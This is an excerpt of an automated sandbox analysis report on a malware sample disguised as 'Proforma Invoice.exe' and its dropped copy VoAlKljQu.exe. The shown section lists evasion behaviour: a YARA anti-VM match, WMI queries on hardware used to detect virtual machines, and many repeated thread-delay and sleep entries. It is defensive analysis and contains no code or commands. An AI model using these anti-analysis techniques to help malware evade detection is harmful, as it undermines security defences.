Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VoAlKljQu.exe PID: 7492, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 2590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 72C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 82C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 8470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 9470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 2B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 4B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 7590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 8590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 8730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 9730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 1030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Memory allocated: 2950000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199971	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199844	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199734	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199625	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199515	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199406	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199187	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199078	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198969	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198859	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198750	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198639	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198531	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198422	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198312	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198203	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199879
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199754
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199629
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199504
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199379
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199254
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199129
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1199004
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198879
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198754
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198629
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198504
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198379
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198254
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198129
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1198004
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 1197879

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2962	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4430	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Window / User API: threadDelayed 4439	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Window / User API: threadDelayed 5362	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Window / User API: threadDelayed 7716
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Window / User API: threadDelayed 2119

Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216	Thread sleep count: 2962 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7644	Thread sleep count: 4439 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7644	Thread sleep count: 5362 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99310s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99160s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -99032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98763s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97823s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -97016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96776s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -96188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199971s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1199078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198639s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe TID: 7632	Thread sleep time: -1198094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7656	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7880	Thread sleep count: 7716 > 30
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7880	Thread sleep count: 2119 > 30
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99765s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99544s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99434s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99218s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99104s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -99000s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98778s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98672s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98562s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98452s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98343s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98234s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97796s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97468s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97140s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -97030s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -96921s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -96812s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -96703s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -96593s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199879s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199754s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199629s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199504s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199379s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199254s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199129s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1199004s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198879s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198754s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198629s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198504s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198379s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198254s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198129s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1198004s >= -30000s
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe TID: 7876	Thread sleep time: -1197879s >= -30000s

Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99750	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99421	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99310	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99160	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 99032	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98907	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98763	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98657	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98532	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98406	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98297	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98188	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97938	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97823	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97703	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97594	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97485	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97375	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97266	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97141	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 97016	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96907	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96776	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96657	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96547	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96438	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96313	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 96188	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199971	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199844	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199734	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199625	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199515	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199406	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199297	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199187	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1199078	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198969	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198859	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198750	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198639	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198531	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198422	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198312	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198203	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Thread delayed: delay time: 1198094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Thread delayed: delay time: 99544
